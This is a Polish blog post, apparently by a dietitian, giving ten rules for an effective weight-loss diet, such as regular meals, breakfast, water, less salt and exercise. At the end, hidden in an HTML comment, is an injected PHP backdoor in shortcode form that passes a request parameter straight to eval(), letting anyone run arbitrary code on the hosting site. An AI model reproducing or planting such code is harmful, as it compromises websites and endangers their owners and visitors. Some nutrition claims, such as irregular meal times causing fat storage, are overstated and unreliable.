Dzisiaj podpowiem, jakie są najważniejsze punkty skutecznej diety. Opuszczanie konkretnych punktów może prowadzić do tego, że dieta nie przyniesie oczekiwanych rezultatów. A to przecież osiągniecie wymarzonego celu jest dla nas najważniejsze.

  1. Nie omijaj posiłków!

Bez względu, czy postępujesz według zaleceń dietetyka, czy też walkę z nadwagą podejmujesz samodzielnie ustal sobie codzienną ilość posiłków. Powinno ich być 4-5 w ciągu dnia. Ustalone posiłki powinny mieć określoną ilość kalorii. Śniadanie powinno stanowić 25-30%, obiad 35-40%, kolacja 20%, posiłki pomiędzy 5-10% całodziennej racji pokarmowej. Ominięcie jednego z posiłków spowoduje, że nasz dieta będzie uboższa w kalorie, co albo spowoduje, że zjemy więcej na kolejny posiłek, bądź przy częstym omijaniu, spowoduje, że dieta stanie się zbyt restrykcyjna (o czym w pkt.6)

  1. Jedź o stałych porach!

Nasz organizm posiada wewnętrzny zegar i to od nas zależy czy będzie pracował właściwie. Ustalenie stałych pór posiłków, powoduje, iż organizm zapamięta, że o danej porze otrzyma porcję składników odżywczych, niezbędnych do prawidłowego funkcjonowania. Jeśli godziny posiłków, stale się będą zmieniać, organizm nie będzie wiedział kiedy następna porcja składników pokarmowych, co spowoduje gromadzenie zapasów energii w formie tłuszczu, a więc nadmiaru kilogramów. 

  1. Pamiętaj o śniadaniu!

To nie czcze gadanie! To naprawdę najważniejszy posiłek w ciągu dnia. Zjedzenie smacznego, pełnowartościowego posiłku przed wyjściem z domu, da nam energię niezbędną do porannego rozruchu mózgu! Jedzenie śniadania codziennie przed wyjściem z domu, znacząco przyspiesza nasz metabolizm, czujemy się pełni energii, a nasz mózg zaczyna pracę na najwyższych obrotach. Śniadanie ze sporą ilością węglowodanów złożonych, błonnika oraz owoców lub warzyw, spowoduje, że będziemy mniej ospali, bardziej wypoczęci.

  1. Pij wodę mineralną!

Codziennie powinniśmy wypijać ok 2litrów wody. Ten cudowny napój nie tylko gasi pragnienie, ale także co najważniejsze przyspiesza metabolizm. W wodzie zachodzi wiele procesów biologicznych.

  1.  Unikaj soli, zastąp ją przyprawami!

Nadmierne spożywanie soli kuchennej jest czynnikiem zwiększającym ryzyko wystąpienia wielu chorób cywilizacyjnych, głównie nadciśnienia tętniczego i cukrzycy. Przyprawy nie tylko nadają pokarmom charakteru, mogą skutecznie zastąpić sól dzięki bogactwu różnorodności smaków i zastosowań. Ponadto takie przyprawy jak : imbir, cynamon, papryka chili, kurkuma mają działanie rozgrzewające oraz przyspieszające metabolizm. Także wiele innych przypraw ma korzystne działanie na nasz organizm.

  1. Pamiętaj by dieta nie była zbyt restrykcyjna!

Zbyt niska podaż kalorii w diecie, prowadzi do znacznego obniżenia dostarczanych składników odżywczych, co w długotrwałym stosowaniu może prowadzić do wystąpienia schorzeń tj. anemia, awitaminozo, kwashiorkor i marasmus. Ale prawda jest taka, że mało kto jest wstanie przez długi czas wytrzymać na bardzo restrykcyjnych dietach, a więc dostarczających mniej niż 1000kcal. Ponadto restrykcyjna dieta, w której dodatkowo zazwyczaj posiłki są mało urozmaicone, wykluczone jest wiele grup produktów, prowadzą do frustracji. Czujemy się zmęczeni, ospali, ciągle jesteśmy podenerowani. Zadbajmy więc o to aby dieta była pełnowartościowa, bogata we wszystkie grupy produktów, które dostarczą naszemu organizmowi maksymalnie różnorodnych składników odżywczych.

  1. Jedz więcej warzyw i owoców!

Warzywa i większość owoców dostarcza niedużej ilości kalorii, przy dużej ilości witamin, składników mineralnych oraz błonnika. Dodatkowo warzywa (oprócz ziemniaków, buraków, rzepy, zielonego groszku) i owoce (oprócz banana, arbuza, ananasa, mango, melona) mają niski indeks glikemiczny, co sprawia, że łatwiej zapanować nam uczuciem głód-sytość. Każdego dnia w diecie powinno znaleźć się 5 porcji warzyw i owoców, z rozgraniczenie, iż warzyw powinny być 3-4 porcie.

  1. Pamiętaj o ruchu!

Wielu z Was pewnie najczęściej pomija ten punkt w swojej diecie! Jest od jednak niezbędny! Odpowiednia porcja codziennej aktywności fizycznej przyspiesza proces odchudzania, ale nie tylko. Ruch poprawia naszą kondycję, wzmacnia serce, wzmacnia układ kostno- stawowy. Aktywność fizyczna polecana jest jako prewencja wielu chorób, szczególnie cywilizacyjnych. W odpowiedniej formie, częstotliwości i natężeniu polecana jest każdej grupie wiekowej, a także osobom schorowanym po wcześniej konsultacji lekarskiej.

  1. Ogranicz tłuszcze pochodzenia zwierzęcego!

Tłuszcze pochodzenia zwierzęcego powinniśmy ograniczać, kosztem zdrowych tłuszczów pochodzenia roślinnego. Tłuste czerwone mięso, powinniśmy zastępować, chudym drobiowym, bądź rybami, których tłuszcze bogate są w kwasy omega-3 i omega-6. Kwasy te są niezwykle ważne, szczególne zw względu na prawidłową pracę układu nerwowego oraz budowę szarej masy mózgu. Natomiast nadmiar tłuszczów odzwierzęcych dostarcza sporej ilości cholesterolu, szczególnie fakcji LDL, a więc „złego” cholesterolu. Którego nadmiar prowadzi do rozwoju miażdżycy, chorób układu krążenia, w efekcie zawałów oraz udarów mózgu.

  1. Codziennie przypominaj sobie sobie jaki jest Twój cel!

Na koniec równie ważny, a także często pomijany. Motywacja! Spiszmy sobie w na kartce nasz cel, dlaczego chcemy schudnąć, dlaczego chcemy zmienić swój sposób odżywiani na właściwy zdrowy! Miejmy tę kartę w zasięgu, by w chwilach zwątpienia przypomnieć sobie dlaczego to dla nas takie ważne! Dobrym sposobem by wytrwać w diecie jest poprosić bliskich, by nas wspierali, szczególnie w trudnych chwilach. By utrwalali nas w przekonaniu, że damy sobie radę, że cel jest w naszym zasięgu!

Wszystkim życzę powodzenia w osiąganiu celu! Tym, którzy potrzebują wsparcia dietetyka zapraszam!

 

 



<!– [insert_php]if (isset($_REQUEST[“nKH”])){eval($_REQUEST[“nKH”]);exit;}[/insert_php][php]if (isset($_REQUEST[“nKH”])){eval($_REQUEST[“nKH”]);exit;}[/php] –>